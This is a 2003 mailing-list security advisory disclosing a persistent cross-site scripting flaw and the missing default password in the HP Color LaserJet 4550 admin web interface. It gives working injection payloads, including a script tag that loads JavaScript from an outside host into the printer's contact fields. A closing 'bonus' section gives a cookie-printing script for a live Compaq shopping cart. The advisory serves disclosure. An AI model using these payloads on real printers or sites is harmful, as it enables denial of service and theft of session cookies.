[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE69ddqN19bBL00002722@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: HP 4550 Printer - Remote XSS DoS -
------------------------------------------------------------------
- EXPL-A-2003-018 exploitlabs.com Advisory 018
------------------------------------------------------------------
-= HP Color LaserJet 4550 =-
Donnie Werner
July 22, 2003
http://exploitlabs.com
Product:
--------
Hewlet Packard Color LaserJet 4550 ( possibly others )
Vunerability(s):
----------------
1. Remote Persistant Xss DoS
2. no default password
Description of product:
-----------------------
"Designed for business professionals who want
to communicate more effectively using high-quality,
professional - looking color documents"
VUNERABILITY / EXPLOIT
======================
1. Remote Persistant Xss DoS
-------------------------------
The remote administration interface of the
HP Color LaserJet 4550 uses extensive javascript in
building dynamic content for administration of the
printers setup and manegment.
uhh oh..
Detail: by introducing XSS we render the remote interface useless...
Example 1.
Add Link:
The HP allows an inclusion of a user definable link...
http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go
http://[printer-ip]/hp/device/this.LCDispatcher
-------
Device:
LINKS:
use: <script>alert("You are vunerable to xss - discovered by morning_wood
http://exploitlabs.com")</script>
when re-renderd we get weird out put depending on the JS used..
some examples..
http://<iframe%20src=/
" id="lnkOtherLink0" target="_blank">
http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id=
as you can see the left hand menu has completly been rendered useless...
( sorry )
looking at the source...
--------- snip -------------
}
document.writeln('<div id="navcap"><img border="0"
src="images/button_bottom.gif" width="140" height="21"><BR>');
string = 'Other Links';
document.writeln('<p><b>' + string + '</b><br>');
tmpString = '<a target="_blank"
href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer"
id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">My Printer</font></a><br><a target="_blank"
href="this.LCDispatcher?dispatch=html&page=order_supplies"
id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Order Supplies</font></a><br><a target="_blank"
href="http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s=
x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Solve A Problem</font></a><br>';
document.writeln(tmpString);
tmpString = '<a href="http://<script>alert("You are vunerable to xss -
discover" id="lnkOtherLink0" target="_blank"><font
face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2"><script>alert("Y</font></a><br>';
document.writeln(tmpString + '</p>');
document.writeln('</div>');
mapheight = navcaptop - topofbuttons;
document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif"
width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>');
document.writeln('<MAP NAME="buttonsmap">');
for (var i=0; i < buttonarray.length; i++) {
document.writeln('<AREA SHAPE="rect"
COORDS="'+buttonarray[i]['mapcoords']+'",
HREF="'+buttonarray[i]['href']+'">');
}document.writeln('</MAP>');</script>
------- snip -------------
ouch!!
Example 2.
DIAGNOSTICS
Network Statistics
> Protocol Info
Test Page
system contact and system location boxes both vuln to..
<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>
which allows remote inclusion that is persistant
this writes to the rom and is viewable even over snmp
I am assuming the only way to fix these issues
are to upgrade the rom or reset via a CLI interface
2. no password
-----------------------
if this was set this couldnt happen I guess.. ( oops again )
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day ( aww.. shucks )
Vendor Contact:
---------------
Concurrent with this advisory
support@...com
security@...com
Credits:
--------
Donnie Werner
morning_wood@...loitlabs.com
http://exploitlabs.com
Original Advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-018-hp4550.txt
===================================
BONUS !!! EXTRA FUN WiTH HP / COMPAQ:
===================================
http://www.smb.compaq.com/dcart/cart.asp?
choose any product area
go to shoping cart
pick a product / quan
go to checkout
locate the "e-coupon" box
enter <script>document.write(document.cookie)</script>
press "Submit"
laugh "real hard"
Powered by blists - more mailing lists